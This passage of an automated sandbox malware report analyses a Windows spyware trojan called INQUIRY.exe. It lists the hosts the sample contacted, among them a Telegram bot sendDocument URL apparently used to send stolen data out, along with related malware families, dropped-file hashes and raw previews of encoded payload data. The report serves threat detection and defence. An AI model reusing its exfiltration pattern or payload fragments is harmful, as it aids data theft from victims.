                                                https://api.telegram.org/bot-/sendDocument?chat_id=RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://reallyfreegeoip.org/xml/RegSvcs.exe, 00000003.00000002.4150460368.000000000306C000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4151695698.0000000003F81000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152396283.0000000005630000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4152065561.00000000055A0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000003.00000002.4150340194.0000000002CD0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high

                                                    World Map of Contacted IPs

                                                    • No. of IPs < 25%
                                                    • 25% < No. of IPs < 50%
                                                    • 50% < No. of IPs < 75%
                                                    • 75% < No. of IPs

                                                    Public IPs

                                                    IPDomainCountryFlagASNASN NameMalicious
                                                    149.154.167.220
                                                    		api.telegram.orgUnited Kingdom
                                                    		62041TELEGRAMRUfalse
                                                    193.122.6.168
                                                    		checkip.dyndns.comUnited States
                                                    		31898ORACLE-BMC-31898USfalse
                                                    172.67.177.134
                                                    		reallyfreegeoip.orgUnited States
                                                    		13335CLOUDFLARENETUSfalse

                                                    General Information

                                                    Joe Sandbox version:41.0.0 Charoite
                                                    Analysis ID:1580751
                                                    Start date and time:2024-12-26 02:44:05 +01:00
                                                    Joe Sandbox product:CloudBasic
                                                    Overall analysis duration:0h 8m 40s
                                                    Hypervisor based Inspection enabled:false
                                                    Report type:full
                                                    Cookbook file name:default.jbs
                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                    Number of analysed new started processes analysed:8
                                                    Number of new started drivers analysed:0
                                                    Number of existing processes analysed:0
                                                    Number of existing drivers analysed:0
                                                    Number of injected processes analysed:0
                                                    Technologies:
                                                    • HCA enabled
                                                    • EGA enabled
                                                    • AMSI enabled
                                                    Analysis Mode:default
                                                    Analysis stop reason:Timeout
                                                    Sample name:INQUIRY.exe
                                                    Detection:MAL
                                                    Classification:mal100.troj.spyw.evad.winEXE@7/6@3/3
                                                    EGA Information:
                                                    • Successful, ratio: 100%
                                                    HCA Information:
                                                    • Successful, ratio: 98%
                                                    • Number of executed functions: 58
                                                    • Number of non-executed functions: 274
                                                    Cookbook Comments:
                                                    • Found application associated with file extension: .exe
                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                    Warnings

                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                    • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.63
                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                    • Not all processes where analyzed, report is missing behavior information
                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                    • Report size getting too big, too many NtQueryValueKey calls found.

                                                    Simulations

                                                    Behavior and APIs

                                                    TimeTypeDescription
                                                    20:45:24API Interceptor10055287x Sleep call for process: RegSvcs.exe modified

                                                    Joe Sandbox View / Context

                                                    IPs

                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                    149.154.167.220cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                      Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                        Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                          Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                            tg.exeGet hashmaliciousBabadedaBrowse
                                                              tg.exeGet hashmaliciousBabadedaBrowse
                                                                setup.exeGet hashmaliciousBabadedaBrowse
                                                                  file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                    user.exeGet hashmaliciousUnknownBrowse
                                                                      file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                        193.122.6.168Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        YU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        PAYMENT SWIFT AND SOA TT07180016-24_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                        • checkip.dyndns.org/
                                                                        Invoice.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        MV GOLDEN SCHULTE DETAILS.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                        • checkip.dyndns.org/
                                                                        172.67.177.134Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                          HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                            EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                              HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                  rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                    Ziraat_Bankasi_Swift_Mesaji_TXB04958T.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      YU SV Payment.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        PAYMENT ADVICE 750013-1012449943-81347-pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          HUSDGHCE23ED.exeGet hashmaliciousMassLogger RATBrowse

                                                                                            Domains

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            checkip.dyndns.comTechnonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 193.122.6.168
                                                                                            HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.6.168
                                                                                            EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.6.168
                                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.6.168
                                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.6.168
                                                                                            PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 132.226.8.169
                                                                                            MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 193.122.130.0
                                                                                            Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.130.0
                                                                                            rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.130.0
                                                                                            api.telegram.orgTechnonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            tg.exeGet hashmaliciousBabadedaBrowse
                                                                                            • 149.154.167.220
                                                                                            tg.exeGet hashmaliciousBabadedaBrowse
                                                                                            • 149.154.167.220
                                                                                            setup.exeGet hashmaliciousBabadedaBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                            • 149.154.167.220
                                                                                            user.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                            • 149.154.167.220
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, XmrigBrowse
                                                                                            • 149.154.167.220
                                                                                            reallyfreegeoip.orgTechnonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 172.67.177.134
                                                                                            HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 172.67.177.134
                                                                                            EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 172.67.177.134
                                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 104.21.67.152
                                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 104.21.67.152
                                                                                            HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 172.67.177.134
                                                                                            PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 104.21.67.152
                                                                                            MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 104.21.67.152
                                                                                            Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 172.67.177.134
                                                                                            rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 172.67.177.134

                                                                                            ASNs

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            ORACLE-BMC-31898USarmv4l.elfGet hashmaliciousMiraiBrowse
                                                                                            • 129.148.142.134
                                                                                            Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 193.122.6.168
                                                                                            HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.6.168
                                                                                            splm68k.elfGet hashmaliciousUnknownBrowse
                                                                                            • 129.147.168.111
                                                                                            EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.6.168
                                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.6.168
                                                                                            HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.6.168
                                                                                            MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 193.122.130.0
                                                                                            Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.130.0
                                                                                            rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 193.122.130.0
                                                                                            TELEGRAMRUPodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                            • 149.154.167.99
                                                                                            cMTqzvmx9u.exeGet hashmaliciousLummaC, Amadey, LummaC Stealer, RedLineBrowse
                                                                                            • 149.154.167.220
                                                                                            Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 149.154.167.220
                                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            ChoForgot.exeGet hashmaliciousVidarBrowse
                                                                                            • 149.154.167.99
                                                                                            YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.99
                                                                                            YYjRtxS70h.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.99
                                                                                            gVKsiQIHqe.exeGet hashmaliciousVidarBrowse
                                                                                            • 149.154.167.99
                                                                                            trZG6pItZj.exeGet hashmaliciousVidarBrowse
                                                                                            • 149.154.167.99
                                                                                            CLOUDFLARENETUShttps://webmail.buzja.com/?auth=byoungjo.yoo@hyundaimovex.comGet hashmaliciousHTMLPhisherBrowse
                                                                                            • 172.67.167.59
                                                                                            Set-up.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.214.186
                                                                                            setup.exeGet hashmaliciousLummaCBrowse
                                                                                            • 172.67.151.193
                                                                                            Set-up.exeGet hashmaliciousLummaC StealerBrowse
                                                                                            • 172.67.158.190
                                                                                            SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                            • 104.21.89.250
                                                                                            F3ePjP272h.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                            • 172.67.220.198
                                                                                            00000.ps1Get hashmaliciousLummaCBrowse
                                                                                            • 104.21.38.253
                                                                                            https://fsharetv.co/Get hashmaliciousUnknownBrowse
                                                                                            • 172.67.131.140
                                                                                            123.ps1Get hashmaliciousLummaCBrowse
                                                                                            • 104.21.90.105

                                                                                            JA3 Fingerprints

                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                            54328bd36c14bd82ddaa0c04b25ed9adTechnonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 172.67.177.134
                                                                                            HALKBANK EKSTRE.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 172.67.177.134
                                                                                            EPIRTURMEROOO0060.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 172.67.177.134
                                                                                            Proforma Invoice.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 172.67.177.134
                                                                                            Azygoses125.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 172.67.177.134
                                                                                            HUBED342024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 172.67.177.134
                                                                                            PARATRANSFARI REMINDER.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 172.67.177.134
                                                                                            MT Eagle Asia 11.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                            • 172.67.177.134
                                                                                            Order_12232024.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 172.67.177.134
                                                                                            rTTSWIFTCOPIES.exeGet hashmaliciousMassLogger RATBrowse
                                                                                            • 172.67.177.134
                                                                                            3b5074b1b5d032e5620f69f9f700ff0e00000.ps1Get hashmaliciousLummaCBrowse
                                                                                            • 149.154.167.220
                                                                                            123.ps1Get hashmaliciousLummaCBrowse
                                                                                            • 149.154.167.220
                                                                                            PodcastsTries.exeGet hashmaliciousVidarBrowse
                                                                                            • 149.154.167.220
                                                                                            wUSt04rfJ0.exeGet hashmaliciousQuasarBrowse
                                                                                            • 149.154.167.220
                                                                                            #U65b0#U5efa #U6587#U672c#U6587#U6863.ps1Get hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220
                                                                                            gYjK72gL17.exeGet hashmaliciousStealc, VidarBrowse
                                                                                            • 149.154.167.220
                                                                                            Technonomic.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                            • 149.154.167.220
                                                                                            Gq48hjKhZf.exeGet hashmaliciousLodaRATBrowse
                                                                                            • 149.154.167.220
                                                                                            Gq48hjKhZf.exeGet hashmaliciousUnknownBrowse
                                                                                            • 149.154.167.220

                                                                                            Dropped Files

                                                                                            No context

                                                                                            Created / dropped Files

                                                                                            C:\Users\user\AppData\Local\Temp\aut7EA8.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):204068
                                                                                            Entropy (8bit):7.985333362045498
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:mrlA2rxhV0hsHAl2kQZe/LFw8zERPwp3o72cfWwVmR9LdZadjJYVNQ3mCJURkajg:WR7AtpwfYp3o79VmRBQjJ+Q3mGU3g
                                                                                            MD5:3421F08B15AE56A44953DC2A78073510
                                                                                            SHA1:E82E8801163AAF8DEB66071C526F3E3A95684C11
                                                                                            SHA-256:9511A309031269A6C561032C635F132FEC93F984AB444771F3C53D84B6D1F73B
                                                                                            SHA-512:C10EA4765F849C30CAC4A50572EE21A1AF08FE61B2C0935B95508978441111361520EE0BB26DD5AB75D0B8A9A7FD6B27D2707132427B62D25163202730692850
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:EA06..2...9..m"gQ..fu...4.Ri..%J.J.L).....X...SI...k....P.X.S|.J.....zg....;+....G ....9|..>..j3[L._Z.H$V..v.j...R..ri_..,fI_._...:.9...N..`..s.4.....t.$.? .J........M...t..i.......H.Y&[.U.A/..${.....4...........7Z..=.V.....L-...BaU..).:.j.-]p..E`........iY..*..Ut.c3`..s..*.:.0...5..Vg...@...R.U...f$`&..W.S....5..:.*..W.4..?.Z...[..,.N.;........9T../.;$.N....S.E.V.@..BeQ..@.>...(...J<.C.V@....a$.,:. ....R.B..I|..,|....RmI.V@...h...Ri..T.S8.......3.R.u.0..o..y|...j.........(=.a...).M..AX..S>.f.6..hy...3..Q<Q.VS.....\..9......#...w.Ri.o..k.:.;...`..=.#=..e?.X$^....T.......~I^...R..N0.q0.D.3@...].^.....f...L2..T..Wo..N.a..U...........'.#..(...[...f....I...j......`.......[$u..f/X.q.@.D~5....w..2...._X...Q..x..]CsY..f.j..An...T.e.!i..)~N5...XO<.......n9sJO2mL.v...~.oq...T.d;.........K..`<......K/rZ......A..<.c(.......Q...zM&...rv...g-..rZ~.=..h..H..,.....P..4>.&iH.S..k.z...m...4....a..i.$.q.`y.I......@s...%..sd...oc....;.d.7..V.|..?...S...M..1

                                                                                            C:\Users\user\AppData\Local\Temp\aut7EE7.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):9650
                                                                                            Entropy (8bit):7.598242512517557
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:c09SJLZ7jNO7shYbDpxJ6RVpqWek6eHKIeeha0a1RgOKsUmIdy41hjGjRUuiTzCT:X9SJtjub0Lb9K+hda1C/MIc0qjuuiTzw
                                                                                            MD5:E6114AD1542DDB63F474D33C6263F1D6
                                                                                            SHA1:611B0088405B3598B51300107F27ABA16E778928
                                                                                            SHA-256:49C5AA4F1CDF2722CD20602DF79AED81E2AF677DC188680944649D1587768108
                                                                                            SHA-512:C954F96C008A7B3BE4B968323A42F47E994A9238EA7861099BE56707EA4B39CA4583D446E64F28EDC71A82F55E1214DAACFB3403C16EF8DFFBF46104BEEA8CB6
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:EA06..p..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....|.....,S`..N,`...H.......|....F. ,_...c3..........;..:&.>_L.n....f.G_T......|.).......&.....8...&V....ia...=.....Y......&..`.l..|.[.....Yl ....ab...,@....ib........h.._..@...3|.P.o.ac.....+.....N.i|sk....8..4|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....

                                                                                            C:\Users\user\AppData\Local\Temp\aut8242.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):204068
                                                                                            Entropy (8bit):7.985333362045498
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:mrlA2rxhV0hsHAl2kQZe/LFw8zERPwp3o72cfWwVmR9LdZadjJYVNQ3mCJURkajg:WR7AtpwfYp3o79VmRBQjJ+Q3mGU3g
                                                                                            MD5:3421F08B15AE56A44953DC2A78073510
                                                                                            SHA1:E82E8801163AAF8DEB66071C526F3E3A95684C11
                                                                                            SHA-256:9511A309031269A6C561032C635F132FEC93F984AB444771F3C53D84B6D1F73B
                                                                                            SHA-512:C10EA4765F849C30CAC4A50572EE21A1AF08FE61B2C0935B95508978441111361520EE0BB26DD5AB75D0B8A9A7FD6B27D2707132427B62D25163202730692850
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:EA06..2...9..m"gQ..fu...4.Ri..%J.J.L).....X...SI...k....P.X.S|.J.....zg....;+....G ....9|..>..j3[L._Z.H$V..v.j...R..ri_..,fI_._...:.9...N..`..s.4.....t.$.? .J........M...t..i.......H.Y&[.U.A/..${.....4...........7Z..=.V.....L-...BaU..).:.j.-]p..E`........iY..*..Ut.c3`..s..*.:.0...5..Vg...@...R.U...f$`&..W.S....5..:.*..W.4..?.Z...[..,.N.;........9T../.;$.N....S.E.V.@..BeQ..@.>...(...J<.C.V@....a$.,:. ....R.B..I|..,|....RmI.V@...h...Ri..T.S8.......3.R.u.0..o..y|...j.........(=.a...).M..AX..S>.f.6..hy...3..Q<Q.VS.....\..9......#...w.Ri.o..k.:.;...`..=.#=..e?.X$^....T.......~I^...R..N0.q0.D.3@...].^.....f...L2..T..Wo..N.a..U...........'.#..(...[...f....I...j......`.......[$u..f/X.q.@.D~5....w..2...._X...Q..x..]CsY..f.j..An...T.e.!i..)~N5...XO<.......n9sJO2mL.v...~.oq...T.d;.........K..`<......K/rZ......A..<.c(.......Q...zM&...rv...g-..rZ~.=..h..H..,.....P..4>.&iH.S..k.z...m...4....a..i.$.q.`y.I......@s...%..sd...oc....;.d.7..V.|..?...S...M..1

                                                                                            C:\Users\user\AppData\Local\Temp\aut8291.tmp

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):9650
                                                                                            Entropy (8bit):7.598242512517557
                                                                                            Encrypted:false
                                                                                            SSDEEP:192:c09SJLZ7jNO7shYbDpxJ6RVpqWek6eHKIeeha0a1RgOKsUmIdy41hjGjRUuiTzCT:X9SJtjub0Lb9K+hda1C/MIc0qjuuiTzw
                                                                                            MD5:E6114AD1542DDB63F474D33C6263F1D6
                                                                                            SHA1:611B0088405B3598B51300107F27ABA16E778928
                                                                                            SHA-256:49C5AA4F1CDF2722CD20602DF79AED81E2AF677DC188680944649D1587768108
                                                                                            SHA-512:C954F96C008A7B3BE4B968323A42F47E994A9238EA7861099BE56707EA4B39CA4583D446E64F28EDC71A82F55E1214DAACFB3403C16EF8DFFBF46104BEEA8CB6
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:EA06..p..L&.[...e....;..`....y...b.......s8..&...j.%.$.m8..Sp.N.g.....m.X@..K...c.$....lL.`..Ng6)...l.I...b....4..,S@..l.l.-z..f.6|v...Qc.0.......q4.Y..k..h......c ._..p.1....qa.H....9..$l.3..Y@.6...$.a5.H.f@.....|3....fs9..%d.M...5...&.@.@.K.I.....Y.x>9.....Y.j.;.......j.;-....Y@j.9.....K,..1...'.`....|.....,S`..N,`...H.......|....F. ,_...c3..........;..:&.>_L.n....f.G_T......|.).......&.....8...&V....ia...=.....Y......&..`.l..|.[.....Yl ....ab...,@....ib........h.._..@...3|.P.o.ac.....+.....N.i|sk....8..4|.0...c....7....k ..7.X..TD....M&`....g....,,`....>.Y...$.@&....L&.P.....32.|&.G%......h...,..33.%.....BS...Nf......f.4.L,.9."....Bvp.Y...ffS{$..d..,.@8@.......@.3d.L..k4.h..M.B:.Y...fg6.;.ab....98.L..:.....of.L.*..Fp........36.Y&.k,.b...' !...,t.33.4.c2.X.M....#......j.d...[..%3.....c....M'6...ic....!..,..3 k..p....@...L&..........., ....#......f.8.X..K..`....zn........0{.k7....!..,...S.%..9..J@^@.G'.......aa.M..)LM@B:.Y...ffS...r....@...N@.:.....n..Mf@....

                                                                                            C:\Users\user\AppData\Local\Temp\pensum

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            File Type:ASCII text, with very long lines (28674), with no line terminators
                                                                                            Category:dropped
                                                                                            Size (bytes):28674
                                                                                            Entropy (8bit):3.5800040611229567
                                                                                            Encrypted:false
                                                                                            SSDEEP:768:G3i/OSyPUeVEZwkOEOsjwp5Js6GUL1vl1+fnd1uLphM:UiWSyPUJWkOvsduLDM
                                                                                            MD5:3CAD5BF1A8339A6018D5F2FE71094216
                                                                                            SHA1:90AF0D2C0BC3AE1AA9F6ED09F8167DE5502B5AA3
                                                                                            SHA-256:497179D433DE315AD82F4006A5EF0C214993692E1AA13CB4F4C8D90406A70B48
                                                                                            SHA-512:8B926DA3EE6D5448C906E0E73E22FFDE62B52F79A0E3E372678300A7340D919F1E0688D7F3FAAE0413F55BE59764EAE708EDFAE1B2EAE70E7A35A0B5961FD323
                                                                                            Malicious:false
                                                                                            Reputation:low
                                                                                            Preview:x055b8ce18cecc20000065758bb6000000669854489b560000006698d468ab27000000669855888be6000000669854a89b560000006698d4c8abc6000000669855e88b33000000669854099b230000006698d429abe2000000669855498b46000000669854699bc60000006698d489abc6000000669855a9330c669854c99be60000006698d844ffffffab4700000066985964ffffff8b4600000066985884ffffff9bc60000006698d8a4ffffffabc6000000669859c4ffffff8be2000000669858e4ffffff9b460000006698d805ffffffabc600000066985925ffffff8bc600000066985845ffffff339c6698d865ffffffab570000006698550d8b370000006698542d9b560000006698d44dab270000006698556d8b330000006698548d9b230000006698d4adabe2000000669855cd8b46000000669854ed9bc60000006698d40eabc60000006698552e330c6698544e9b160000006698d886ffffffab46000000669859a6ffffff8b67000000669858c6ffffff9b160000006698d8e6ffffffab0700000066985907ffffff8b9600000066985827ffffff9b330000006698d847ffffffab2300000066985967ffffff8be200000066985887ffffff9b460000006698d8a7ffffffabc6000000669859c7ffffff8bc6000000669858e7ffffff339c6698d408ab370000006698550a8b86

                                                                                            C:\Users\user\AppData\Local\Temp\snaith

                                                                                            Download File
                                                                                            Process:C:\Users\user\Desktop\INQUIRY.exe
                                                                                            File Type:data
                                                                                            Category:dropped
                                                                                            Size (bytes):209408
                                                                                            Entropy (8bit):7.861069779097261
                                                                                            Encrypted:false
                                                                                            SSDEEP:3072:ZRbvSm21cUSpdMmGIUrTktO2g8KXC7HUwZdZRNJgFK71IYInRmt8xDsAxIbTrt9p:fbv+/QrawoXWHVZRNuk71Ihm6uYalyW
                                                                                            MD5:1245CACED7126DBBC93E4D1593403B59
                                                                                            SHA1:FD14755FC9163BAB14D3BFD0FCDA15466E9697A3
                                                                                            SHA-256:448ED4DF2A1D973AB7B479D8F63D636E8B8E0755551B5AF34E0DDEB6F61CC24D
                                                                                            SHA-512:4725C5360B8571795192C95593C2F8B744F809B1040602BE64CB2E54C52AD047DC5E24DF740E420B7CF75CD236D6697C79E1865E2981A5A519CCEEAAA71CAB7D
                                                                                            Malicious:false
                                                                                            Reputation:low
